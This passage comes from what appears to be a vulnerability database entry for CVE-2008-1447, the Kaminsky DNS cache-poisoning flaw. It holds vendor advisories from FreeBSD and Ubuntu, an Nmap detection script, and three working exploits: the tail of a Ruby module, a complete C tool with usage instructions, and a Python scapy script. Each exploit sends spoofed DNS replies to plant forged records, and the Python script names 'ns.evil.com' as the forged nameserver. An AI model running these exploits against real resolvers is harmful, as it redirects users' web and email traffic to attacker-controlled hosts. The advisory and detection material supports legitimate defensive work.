Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for 
#{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} 
queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. 
This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2020-07-09T00:23:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Bind. A remote attacker could exploit this to spoof DNS entries and \npoison DNS caches. Among other things, this could lead to misdirected \nemail and web traffic.", "edition": 5, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "USN-622-1", "href": "https://ubuntu.com/security/notices/USN-622-1", "title": "Bind vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). 
Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. 
In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. 
\"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. 
If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define _BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n 
uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, 
&len2, data);\n *len += len2;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response 
overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = 
addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. 
The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: <domain> NS 
<subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning (Python)", "edition": 1, "published": "2008-07-24T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning (Python)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF", "href": "", "sourceData": "from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = \"X.X.X.X\"\n# Vulnerable recursive DNS server\ntargetdns = \"X.X.X.X\"\n# Authoritative NS for the target domain\nsrcdns = [\"X.X.X.X\"]\n\n# Domain to play with\ndummydomain = \"\"\nbasedomain = \".example.com.\"\n# sub-domain to claim authority on\ndomain = \"sub.example.com.\"\n# Spoofed authoritative DNS for the sub-domain\nspoof=\"ns.evil.com.\"\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = \"a\" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t 
qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint \"Sending our reply from %s with TXID = %s for %s\" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint \"Successfully poisonned our target with a dummy record !!\"\n\t\t\tbreak\n\texcept:\n\t\tprint \"Poisonning failed\"\n\n# milw0rm.com [2008-07-24]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "### Background\n\nISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. \n\n### Description\n\nDan Kaminsky of IOActive has reported a weakness in the DNS protocol related to insufficient randomness of DNS transaction IDs and 